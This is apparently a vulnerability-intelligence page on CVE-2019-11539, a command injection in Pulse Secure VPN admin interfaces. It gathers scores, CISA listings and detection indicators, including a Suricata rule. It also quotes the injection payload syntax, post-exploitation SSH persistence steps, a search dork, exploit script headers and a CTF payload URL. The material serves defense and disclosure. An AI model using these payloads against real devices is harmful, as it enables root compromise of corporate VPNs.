CVE-2019-11539
published 2019-04-26CVE-2019-11539: In Pulse Secure Pulse Connect Secure version 9.0RX before 9.0R3.4, 8.3RX before 8.3R7.1, 8.2RX before 8.2R12.1, and 8.1RX before 8.1R15.1 and Pulse Policy…
PriorityP187high7.2CVSS 3.1
AVNACLPRHUINSUCHIHAH
KEVITWEXPLOITRansomware
CISA Known Exploited Vulnerabilitydue 2022-05-03
Exploited in the wild
EPSS
98.62%
99.9th percentile
In Pulse Secure Pulse Connect Secure version 9.0RX before 9.0R3.4, 8.3RX before 8.3R7.1, 8.2RX before 8.2R12.1, and 8.1RX before 8.1R15.1 and Pulse Policy Secure version 9.0RX before 9.0R3.2, 5.4RX before 5.4R7.1, 5.3RX before 5.3R12.1, 5.2RX before 5.2R12.1, and 5.1RX before 5.1R15.1, the admin web interface allows an authenticated attacker to inject and execute commands.
Affected
72 ranges· showing 25
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| ivanti | connect_secure | — | — |
| ivanti | connect_secure | — | — |
| ivanti | connect_secure | — | — |
| ivanti | connect_secure | — | — |
| ivanti | policy_secure | — | — |
| ivanti | pulse_connect_secure | — | — |
| pulsesecure | pulse_policy_secure | — | — |
| pulsesecure | pulse_policy_secure | — | — |
| pulsesecure | pulse_policy_secure | — | — |
| pulsesecure | pulse_policy_secure | — | — |
| pulsesecure | pulse_policy_secure | — | — |
| pulsesecure | pulse_policy_secure | — | — |
| pulsesecure | pulse_policy_secure | — | — |
| pulsesecure | pulse_policy_secure | — | — |
| pulsesecure | pulse_policy_secure | — | — |
| pulsesecure | pulse_policy_secure | — | — |
| pulsesecure | pulse_policy_secure | — | — |
| pulsesecure | pulse_policy_secure | — | — |
| pulsesecure | pulse_policy_secure | — | — |
| pulsesecure | pulse_policy_secure | — | — |
| pulsesecure | pulse_policy_secure | — | — |
| pulsesecure | pulse_policy_secure | — | — |
| pulsesecure | pulse_policy_secure | — | — |
| pulsesecure | pulse_policy_secure | — | — |
| pulsesecure | pulse_policy_secure | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Exploit sends a GET request to /dana-admin/diag/diag.cgi with parameter 'a=td' (tcpdump action) and an 'options' parameter containing the Perl injection payload '-r$x="<cmd>",system$x#' to overwrite /data/runtime/tmp/tt/setcookie.thtml.ttc, then triggers execution via a second GET to /dana-na/auth/setcookie.cgi. ↗
- →The injection payload uses Perl syntax: -r$x="<command>",system$x# to inject arbitrary OS commands via the tcpdump 'options' parameter. Detect GET requests to /dana-admin/diag/diag.cgi containing 'system' and '$x' in the 'options' query parameter. ↗
- →The exploit uses 'env' to bypass application whitelisting before the injected command. Look for 'env ' prepended to commands in the options parameter. ↗
- →The exploit requires a valid admin DSID session cookie. Monitor for DSID cookie usage against /dana-admin/ paths from unexpected source IPs, especially combined with requests to diag.cgi. ↗
- →Post-exploitation: attacker downloads files using /home/bin/curl (not in $PATH by default) and modifies /etc/cloud_sshd_config and /.ssh/authorized_keys to establish persistent SSH root access on port 6667. ↗
- →The CSRF token 'xsauth' is extracted from the diag.cgi page body via regex scan for /xsauth=([[:xdigit:]]+)/. Monitor for rapid sequential GET then GET patterns to diag.cgi followed by setcookie.cgi. ↗
- →Google dork for exposed vulnerable endpoints: inurl:/dana-na/ filetype:cgi ↗
- →CVE-2019-11539 is known to be used in ransomware campaigns and is listed in the CISA Known Exploited Vulnerabilities catalog. Prioritize detection and patching accordingly. ↗
- ·The exploit payload has bad characters that must be avoided: &*(){}[]`;|?\n~<>"'. The Metasploit module forces manual bad-character analysis with 'generic/none' encoder for the Unix In-Memory target. ↗
- ·The CTF writeup demonstrates that \x2a (ASCII '*') can be used as a wildcard substitute for '$' in the payload to bypass certain character filters, and Unicode line terminators (U+2028 LINE SEPARATOR) can replace filtered \n/\r. ↗
- ·Affected versions: Pulse Connect Secure 9.0RX before 9.0R3.4, 8.3RX before 8.3R7.1, 8.2RX before 8.2R12.1, 8.1RX before 8.1R15.1; Pulse Policy Secure 9.0RX before 9.0R3.2, 5.4RX before 5.4R7.1, 5.3RX before 5.3R12.1, 5.2RX before 5.2R12.1, 5.1RX before 5.1R15.1. ↗
CVSS provenance
nvdv3.17.2HIGHCVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
nvdv3.08.0HIGHCVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:C/C:H/I:H/A:H
nvdv2.06.5MEDIUMAV:N/AC:L/Au:S/C:P/I:P/A:P
vulncheck7.2HIGH
cisa7.2HIGH
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
Ivanti
Pulse Connect Secure Command Injection (admin)
vendor_ivanti·2021-11-03·CVSS 7.2
CVE-2019-11539 [HIGH] Pulse Connect Secure Command Injection (admin)
Pulse Connect Secure Command Injection (admin)
Ivanti Pulse Connect Secure and Policy Secure allows an authenticated attacker from the admin web interface to inject and execute commands.
CVE IDs: CVE-2019-11539
Affected products: Pulse Connect Secure
This vulnerability is listed in the CISA Known Exploited Vulnerabilities catalog.
Required Action: Apply updates per vendor instructions.
Remediation Due Date: 2022-05-03
Known to be used in ransomware campaigns.
CISA
Ivanti Pulse Connect Secure and Policy Secure Command Injection Vulnerability
cisa·2021-11-03·CVSS 7.2
CVE-2019-11539 [HIGH] CWE-78 Ivanti Pulse Connect Secure and Policy Secure Command Injection Vulnerability
Vulnerability: Ivanti Pulse Connect Secure and Policy Secure Command Injection Vulnerability
Affected: Ivanti Pulse Connect Secure and Pulse Policy Secure
Ivanti Pulse Connect Secure and Policy Secure allows an authenticated attacker from the admin web interface to inject and execute commands.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2019-11539
Remediation Due Date: 2022-05-03
GHSA
GHSA-mchx-p635-vpq8: In Pulse Secure Pulse Connect Secure version 9
ghsa_unreviewed·2022-05-24
CVE-2019-11539 [HIGH] CWE-78 GHSA-mchx-p635-vpq8: In Pulse Secure Pulse Connect Secure version 9
In Pulse Secure Pulse Connect Secure version 9.0RX before 9.0R3.4, 8.3RX before 8.3R7.1, 8.2RX before 8.2R12.1, and 8.1RX before 8.1R15.1 and Pulse Policy Secure version 9.0RX before 9.0R3.2, 5.4RX before 5.4R7.1, 5.3RX before 5.3R12.1, 5.2RX before 5.2R12.1, and 5.1RX before 5.1R15.1, the admin web interface allows an authenticated attacker to inject and execute commands.
VulnCheck
Ivanti Pulse Connect Secure and Policy Secure Command Injection Vulnerability
vulncheck·2019·CVSS 7.2
CVE-2019-11539 [HIGH] CWE-78 Ivanti Pulse Connect Secure and Policy Secure Command Injection Vulnerability
Ivanti Pulse Connect Secure and Policy Secure Command Injection Vulnerability
Ivanti Pulse Connect Secure and Policy Secure allows an authenticated attacker from the admin web interface to inject and execute commands.
Affected: Ivanti Connect Secure and Policy Secure
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.ncsc.gov.uk/news/alert-vpn-vulnerabilities; https://cisa.gov/news-events/cybersecurity-advisories/aa20-259a; https://www.esentire.com/security-advisories/ransomware-groups-exploit-remote-access-services; https://cdn.pathfactory.com/assets/10753/contents/298161/03f15d14-01bb-462b-a8d4-d8c6149f5604.pdf; https://cybersecurityworks.com/patchwatch/patch-watch-csw-analysis-of-pulse-secure-vulnerabili
Suricata
ET EXPLOIT Pulse Secure Post-Auth OS Command Injection (CVE-2019-11539)
suricata·2021-09-23·CVSS 7.2
CVE-2019-11539 [HIGH] ET EXPLOIT Pulse Secure Post-Auth OS Command Injection (CVE-2019-11539)
ET EXPLOIT Pulse Secure Post-Auth OS Command Injection (CVE-2019-11539)
Rule: alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Pulse Secure Post-Auth OS Command Injection (CVE-2019-11539)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/dana-admin/diag/diag.cgi"; fast_pattern; content:"&options="; distance:0; content:"-r"; distance:0; reference:url,packetstormsecurity.com/files/154376/Pulse-Secure-8.1R15.1-8.2-8.3-9.0-SSL-VPN-Remote-Code-Execution.html; reference:url,packetstormsecurity.com/files/155277/Pulse-Secure-VPN-Arbitrary-Command-Execution.html; reference:cve,2019-11539; classtype:attempted-admin; sid:2034014; rev:1; metadata:affected_product Pulse_Secure, attack_target Server, created_at 2021_09_23, cve CVE_2019_11539, deployment P
Exploit-DB
Pulse Secure VPN - Arbitrary Command Execution (Metasploit)
exploitdb·2019-11-20
CVE-2019-11539 Pulse Secure VPN - Arbitrary Command Execution (Metasploit)
Pulse Secure VPN - Arbitrary Command Execution (Metasploit)
---
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule 'Pulse Secure VPN Arbitrary Command Execution',
'Description' => %q{
This module exploits a post-auth command injection in the Pulse Secure
VPN server to execute commands as root. The env(1) command is used to
bypass application whitelisting and run arbitrary commands.
Please see related module auxiliary/gather/pulse_secure_file_disclosure
for a pre-auth file read that is able to obtain plaintext and hashed
credentials, plus session IDs that may be used with this exploit.
A valid administrator session ID is required in lieu of untested SSRF.
},
'Author' => [
'Oran
Exploit-DB
Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Remote Code Execution
exploitdb·2019-09-06·CVSS 7.2
CVE-2019-11539 [HIGH] Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Remote Code Execution
Pulse Secure 8.1R15.1/8.2/8.3/9.0 SSL VPN - Remote Code Execution
---
#!/usr/bin/python
#
# Exploit Title: Pulse Secure Post-Auth Remote Code Execution
# Google Dork: inurl:/dana-na/ filetype:cgi
# Date: 09/05/2019
# Exploit Author: Justin Wagner (0xDezzy), Alyssa Herrera (@Alyssa_Herrera_)
# Vendor Homepage: https://pulsesecure.net
# Version: 8.1R15.1, 8.2 before 8.2R12.1, 8.3 before 8.3R7.1, and 9.0 before 9.0R3.4
# Tested on: linux
# CVE : CVE-2019-11539
#
# Initial Discovery: Orange Tsai (@orange_8361), Meh Chang (@mehqq_)
#
# Exploits CVE-2019-11539 to run commands on the Pulse Secure Connect VPN
# Downloads Modified SSH configuration and authorized_keys file to allow SSH as root.
# You will need your own configuration and authorized_keys files.
#
# Reference: https://nvd.nist.gov/v
Metasploit
Pulse Secure VPN Arbitrary Command Execution
metasploit
Pulse Secure VPN Arbitrary Command Execution
Pulse Secure VPN Arbitrary Command Execution
This module exploits a post-auth command injection in the Pulse Secure VPN server to execute commands as root. The env(1) command is used to bypass application whitelisting and run arbitrary commands. Please see related module auxiliary/gather/pulse_secure_file_disclosure for a pre-auth file read that is able to obtain plaintext and hashed credentials, plus session IDs that may be used with this exploit. A valid administrator session ID is required in lieu of untested SSRF.
HackerOne
Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://██████ (███)
hackerone·2024-06-18·CVSS 7.2
CVE-2019-11510 [HIGH] Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://██████ (███)
Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://██████ (███)
##Description
Hello. Some time ago, researcher Orange Tsai from DEVCORE team had a talk on Defcon/BlackHat regarding Pulse Secure SSL VPN vulnerabilities fixed on 2019/4/25:
**CVE-2019-11510 - Pre-auth Arbitrary File Reading**
CVE-2019-11542 - Post-auth Stack Buffer Overflow
**CVE-2019-11539 - Post-auth Command Injection**
CVE-2019-11538 - Post-auth Arbitrary File Reading
**CVE-2019-11508 - Post-auth Arbitrary File Writing**
CVE-2019-11540 - Post-auth Session Hijacking
Link to the slides: https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf
I discovered that `https://██████████` instance is vulnerable to described vulnerabilities.
##POC
Reading `/etc/p
HackerOne
Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://████
hackerone·2021-07-29·CVSS 7.2
CVE-2019-11510 [HIGH] Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://████
Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://████
##Description
Hello. Some time ago, researcher Orange Tsai from DEVCORE team had a talk on Defcon/BlackHat regarding Pulse Secure SSL VPN vulnerabilities fixed on 2019/4/25:
**CVE-2019-11510 - Pre-auth Arbitrary File Reading**
CVE-2019-11542 - Post-auth Stack Buffer Overflow
**CVE-2019-11539 - Post-auth Command Injection**
CVE-2019-11538 - Post-auth Arbitrary File Reading
**CVE-2019-11508 - Post-auth Arbitrary File Writing**
CVE-2019-11540 - Post-auth Session Hijacking
Link to the slides: https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf
I discovered that `https://██████████` instance is vulnerable to described vulnerabilities.
##POC
Reading `/etc/passwd` v
HackerOne
Command Injection (via CVE-2019-11510 and CVE-2019-11539)
hackerone·2020-05-07·CVSS 10.0
CVE-2019-11510 [CRITICAL] Command Injection (via CVE-2019-11510 and CVE-2019-11539)
Command Injection (via CVE-2019-11510 and CVE-2019-11539)
**Summary:**
The Navy has a Pulse Secure SSL VPN (https://████████/dana-na/auth/url_default/welcome.cgi) that is vulnerable to:
CVE-2019-11510 - Pre-auth Arbitrary File Reading
CVE-2019-11539 - Post-auth Command Injection
vulnerable hostname from ssl certificate: ██████████.navy.mil
The pre-auth arbitrary file reading vulnerability (CVE-2019-11510) enables an un-authenicated user to read the file /data/runtime/mtmp/lmdb/dataa/data.mdb from the Pulse VPN device. This files contains admin and other users credentials in plain-text format. This information can be used to log into the pulse device as an administrator.
Once logged in as an administrator, the post-auth command injection vulnerability (CVE-2019-11539) allows an attacker
HackerOne
Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://███
hackerone·2019-12-02·CVSS 7.2
CVE-2019-11510 [HIGH] Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://███
Arbitrary File Reading leads to RCE in the Pulse Secure SSL VPN on the https://███
##Description
Hello. Some time ago, researcher Orange Tsai from DEVCORE team had a talk on Defcon/BlackHat regarding Pulse Secure SSL VPN vulnerabilities fixed on 2019/4/25:
**CVE-2019-11510 - Pre-auth Arbitrary File Reading**
CVE-2019-11542 - Post-auth Stack Buffer Overflow
**CVE-2019-11539 - Post-auth Command Injection**
CVE-2019-11538 - Post-auth Arbitrary File Reading
**CVE-2019-11508 - Post-auth Arbitrary File Writing**
CVE-2019-11540 - Post-auth Session Hijacking
Link to the slides: https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdf
I discovered that https://████ instance is vulnerable to described vulnerabilities.
##POC
Extracting `/etc/passwd` as examp
HackerOne
Potential pre-auth RCE on Twitter VPN
hackerone·2019-08-10·CVSS 7.2
[HIGH] Potential pre-auth RCE on Twitter VPN
Potential pre-auth RCE on Twitter VPN
Hi, we(Orange Tsai and Meh Chang) are the security research team from DEVCORE. Recently, we are doing a research about SSL VPN security, and found several critical vulnerabilities on Pulse Secure SSL VPN! We have reported to vendor and [patches](https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101) have been released on `2019/4/25`. Since that, we keep monitoring numerous large corporations using Pulse Secure and we noticed that Twitter haven't patched the SSL VPN server over one month!
These vulnerabilities include a pre-auth file reading(CVSS 10) and a post-auth(admin) command injection(CVSS 8.0) which can be chained into a pre-auth RCE! Here are all vulnerabilities we found:
* CVE-2019-11510 - Pre-auth Arbitrary File Reading
* CV
Tenable
CVE-2025-0282: Ivanti Connect Secure Zero-Day Vulnerability Exploited In The Wild
blogs_tenable·2025-01-08·CVSS 9.0
[CRITICAL] CVE-2025-0282: Ivanti Connect Secure Zero-Day Vulnerability Exploited In The Wild
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
CVE-2023-46805, CVE-2024-21887: Zero-Day Vulnerabilities Exploited in Ivanti Connect Secure and Policy Secure Gateways
blogs_tenable·2024-01-10·CVSS 8.2
[HIGH] CVE-2023-46805, CVE-2024-21887: Zero-Day Vulnerabilities Exploited in Ivanti Connect Secure and Policy Secure Gateways
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Sentinelone
REvil
blogs_sentinelone·2022-11-30
REvil
How It Works The Singularity XDR Difference
Singularity Marketplace One-Click Integrations to Unlock the Power of XDR
Pricing & Packaging Comparisons and Guidance at a Glance
Purple AI Accelerate SecOps with Generative AI
Singularity Hyperautomation Easily Automate Security Processes
AI-SIEM The AI SIEM for the Autonomous SOC
Singularity Data Lake AI-Powered, Unified Data Lake
Singularity Data Lake for Log Analytics Seamlessly Ingest Data from On-Prem, Cloud or Hybrid Environments
Singularity Endpoint Autonomous Prevention, Detection, and Response
Singularity XDR Native & Open Protection, Detection, and Response
Singularity RemoteOps Forensics Orchestrate Forensics at Scale
Singularity
Threat Intelligence Comprehensive Adversary Intelligence
Singularity Vulnerability Management
Qualys
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
blogs_qualys·2022-02-23
Managing CISA Known Exploited Vulnerabilities with Qualys VMDR | Qualys
#### Table of Contents
- Situation
- Directive Scope
- CISA Catalog of Known Exploited Vulnerabilities
- Detect CISA Vulnerabilities Using Qualys VMDR
- CISA Exploited RTI
- Detailed Operational Dashboard
- Remediation
- Federal Enterprises and Agencies Can Act Now
- Summary
- Getting Started
CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively.
## Situation
Last November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a Binding Operational Directiv
Tenable
Hold the Door: Why Organizations Need to Prioritize Patching SSL VPNs
blogs_tenable·2021-08-25
Hold the Door: Why Organizations Need to Prioritize Patching SSL VPNs
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Checkpoint
5th April – Threat Intelligence Report
blogs_checkpoint·2021-04-05
CVE-2021-21975 5th April – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 5th April – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 5th April, please download our Threat Intelligence Bulletin .
Top Attacks and Breaches
Personal information of some 553 million Facebook users from 100 countries has been stolen and published online for free in a hacking forum. The records include full name, Facebook ID, phone number, email, location, bio and more.
Iranian APT group Charming Kitten, linked to the government, has launched a new phishing campaign
Tenable
US Cybersecurity Agency CISA Alert: Foreign Threat Actors Continue to Target Unpatched Vulnerabilities
blogs_tenable·2020-09-17
US Cybersecurity Agency CISA Alert: Foreign Threat Actors Continue to Target Unpatched Vulnerabilities
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
CVE-2018-13379, CVE-2019-11510: FortiGate and Pulse Connect Secure Vulnerabilities Exploited In the Wild
blogs_tenable·2019-08-27·CVSS 9.1
[CRITICAL] CVE-2018-13379, CVE-2019-11510: FortiGate and Pulse Connect Secure Vulnerabilities Exploited In the Wild
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
CVE-2019-11510: Proof of Concept Available for Arbitrary File Disclosure in Pulse Connect Secure
blogs_tenable·2019-08-21·CVSS 10.0
[CRITICAL] CVE-2019-11510: Proof of Concept Available for Arbitrary File Disclosure in Pulse Connect Secure
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Sentinelone
REvil
blogs_sentinelone
REvil
# REvil Ransomware: In-Depth Analysis, Detection, and Mitigation
As if ransomware itself wasn’t dangerous enough, a new type of attack involving ransomware is making waves in the cybersecurity community. Ransomware-as-a-Service (RaaS) operations are becoming more common and more profitable for threat actors looking to launch a variety of attacks. One such operation is known as REvil, and involved a core team of threat actors offering the malware to other attackers for a price.
Although the Russian Federal Security Service claims to have dismantled REvil and charged several of the ransomware group’s members, a deeper look at this type of ransomware and RaaS can help organizations protect themselves against these types of attacks in the future.
## What Is REvil Ransomware?
REvil ransomwa
CTF
20191018-hitcon-quals / README
ctf_writeups·2019·CVSS 7.2
CVE-2019-11539 [HIGH] 20191018-hitcon-quals / README
# HITCON CTF 2019 Writeup
## web
### Virtual Public Network [183pts]
> http://blog.orange.tw/2019/09/attacking-ssl-vpn-part-3-golden-pulse-secure-rce-chain.html
CVE-2019-11539
Use `\x2a` instead of `$`
```
GET /cgi-bin/diag.cgi?options=-r$x%3d"bash+-c+\"/\x2aREAD_FLAG\x2a\"",system$x%23+2>./tmp/cmn.thtml+` can be used as a `SingleLineComment`:
> https://stackoverflow.com/a/18638833
But `\n` and `\r` are filtered.
After reading ECMA-262, we found other line terminators:
> http://www.ecma-international.org/ecma-262/6.0/#sec-line-terminators
So the final payload:
```
http://3.114.5.202/fd.php?q=pupiles。qwer。design/?"%2beval(atob(`ZG9jdW1lbnQuY29va2ll`))%E2%80%A8-->
```
## reverse
### EmojiVM [187pts]
A challenge of vm_re.The Data Struct is a tree like this.
struct node{
qwor
http://packetstormsecurity.com/files/154376/Pulse-Secure-8.1R15.1-8.2-8.3-9.0-SSL-VPN-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/155277/Pulse-Secure-VPN-Arbitrary-Command-Execution.htmlhttp://packetstormsecurity.com/files/162092/Pulse-Secure-VPN-Arbitrary-Command-Execution.htmlhttp://www.securityfocus.com/bid/108073https://devco.re/blog/2019/09/02/attacking-ssl-vpn-part-3-the-golden-Pulse-Secure-ssl-vpn-rce-chain-with-Twitter-as-case-study/https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdfhttps://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0010https://www.kb.cert.org/vuls/id/927237http://packetstormsecurity.com/files/154376/Pulse-Secure-8.1R15.1-8.2-8.3-9.0-SSL-VPN-Remote-Code-Execution.htmlhttp://packetstormsecurity.com/files/155277/Pulse-Secure-VPN-Arbitrary-Command-Execution.htmlhttp://packetstormsecurity.com/files/162092/Pulse-Secure-VPN-Arbitrary-Command-Execution.htmlhttp://www.securityfocus.com/bid/108073https://devco.re/blog/2019/09/02/attacking-ssl-vpn-part-3-the-golden-Pulse-Secure-ssl-vpn-rce-chain-with-Twitter-as-case-study/https://i.blackhat.com/USA-19/Wednesday/us-19-Tsai-Infiltrating-Corporate-Intranet-Like-NSA.pdfhttps://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101https://psirt.global.sonicwall.com/vuln-detail/SNWLID-2019-0010https://www.kb.cert.org/vuls/id/927237https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2019-11539
2019-04-26
Published
2021-11-03
Added to CISA KEV
Exploited in the wild